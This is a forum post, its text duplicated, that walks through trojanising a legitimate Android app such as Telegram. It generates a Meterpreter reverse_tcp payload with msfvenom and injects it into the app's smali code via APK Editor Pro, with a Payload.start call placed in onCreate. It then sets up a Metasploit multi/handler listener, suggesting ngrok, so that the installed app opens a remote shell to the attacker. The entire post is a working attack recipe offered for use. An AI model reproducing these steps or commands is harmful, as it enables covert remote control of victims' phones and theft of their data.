OP 22 April, 2020 - 09:47 PM
for this tutorial i will use
Metasploit-Framework
Apk Editor Pro ( Android )
search on internet how to install it on Linux/Windows etc.
--------------------------------------------------------------------------------------
1) generate payload : msfvenom -p android/meterpreter/reverse_tcp LHOST="IP" LPORT="port" R > C:.......(your output root)
i recommend to use ngrok
2) download any app from internet ex Telegram
Now copy the payload generated and place it on your android phone, (DON'T INSTALL IT)
3) open apk editor pro
3) select the app with the payload and put full edit and go to file
4) click smali
5) go to smali / com and extract the metasploit folder to sd card and exit
6) select the original app
7) full edit-file-smali
8) smali / com and add the metasploit folder
9) Search the original application's MainActivity.smali or StartActivity.smali or similiar.... and open it
10) find "onCreate (landroid / os / bundle;) V"
11) enter 'invoke-static {p0}, Lcom / metasploit / stage / Payload; -> start (Landroid / content / Context;) V'
12) copy the AndroidManifest.xml of the Payload app and paste it on the original
13) Save, Exit and Build
13) enable the listener and then launch the app
Return on Metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST="ip"
set LPORT="port"
Now install and open the backdoored app (Telegram or someone else) and di handler will reveal the device
Thankyou..
Metasploit-Framework
Apk Editor Pro ( Android )
search on internet how to install it on Linux/Windows etc.
--------------------------------------------------------------------------------------
1) generate payload : msfvenom -p android/meterpreter/reverse_tcp LHOST="IP" LPORT="port" R > C:.......(your output root)
i recommend to use ngrok
2) download any app from internet ex Telegram
Now copy the payload generated and place it on your android phone, (DON'T INSTALL IT)
3) open apk editor pro
3) select the app with the payload and put full edit and go to file
4) click smali
5) go to smali / com and extract the metasploit folder to sd card and exit
6) select the original app
7) full edit-file-smali
8) smali / com and add the metasploit folder
9) Search the original application's MainActivity.smali or StartActivity.smali or similiar.... and open it
10) find "onCreate (landroid / os / bundle;) V"
11) enter 'invoke-static {p0}, Lcom / metasploit / stage / Payload; -> start (Landroid / content / Context;) V'
12) copy the AndroidManifest.xml of the Payload app and paste it on the original
13) Save, Exit and Build
13) enable the listener and then launch the app
Return on Metasploit
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST="ip"
set LPORT="port"
Now install and open the backdoored app (Telegram or someone else) and di handler will reveal the device
Thankyou..